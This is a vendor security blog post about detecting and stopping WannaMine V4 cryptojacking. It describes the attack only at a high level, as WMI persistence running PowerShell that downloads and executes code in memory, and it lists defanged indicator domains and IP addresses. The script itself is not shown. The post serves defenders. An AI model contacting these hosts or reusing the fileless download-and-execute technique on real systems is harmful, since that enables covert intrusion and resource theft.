<img height="1" width="1" style="display:none;" alt="" src="https://dc.ads.linkedin.com/collect/?pid=179060&amp;fmt=gif">

Minerva Labs Blog

News & Reports

Preventing WannaMine4 Cryptojacking Attacks

Cryptojacking is a type of malware attack where threat actors use hijacked devices to illegally mine cryptocurrency.  It is widely considered to be among the least invasive cyber security threats. That is because the goal of a cryptojacker is to remain hidden on the system for as long as possible, thus maximizing the value they extract from the target.

This belief is not only false but dangerous. Cryptojacking malware usually comes through unpatched servers or weak Remote Desktop Protocol (RDP) credentials, which can be exploited by much dreaded ransomware groups just as easily as they are used by cryptocurrency criminals.

WannaMine V4 , an active cryptojacker, has been recently detected and stopped by Minerva Labs. In the attack we detected, threat actors used WMI persistence in order to execute malicious PowerShell scripts that download code and execute it in-memory. In-memory techniques are frequently used by attackers in order to bypass traditional anti-virus products.

The decoded PowerShell script:

The events of the Crypto malware as depicted by Minerva’s platform:

IOCs:

Domain names & IPs:

sjjjv].[xyz:8000

dfdfjkbcf[.]net

profetestruec].[net:8000

winupdate].[firewall-gateway.de:8000

45.140].[88].[145:8000

205.209].[152].[78:8000

If you think your organization may have been the victim of a cryptojacking attack, or want to learn more about Minerva Labs' anti-ransomware protection solutions, contact us.  

Subscribe to Our Blog

Topics

see all